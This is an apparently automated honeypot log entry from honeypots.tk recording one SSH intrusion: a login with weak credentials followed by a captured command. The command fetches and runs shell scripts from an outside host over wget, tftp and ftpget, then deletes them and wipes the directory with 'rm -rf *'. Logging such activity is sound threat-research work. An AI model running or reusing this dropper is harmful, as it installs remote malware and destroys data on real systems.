honeypots.tk

Record Observations : 40.121.109.186 ssh Web script execution 40.121.109.186 YHEFXJ2NNN5AMQ83

<< Back

40.121.109.186 client username 'DUP user' and password 'user' entered
40.121.109.186 client command : 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://199.231.187.11/Arceus.sh; chmod 777 Arceus.sh; sh Arceus.sh; tftp 199.231.187.11 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 199.231.187.11; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 199.231.187.11 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf Arceus.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *'
Author: Honeypots.tk Robot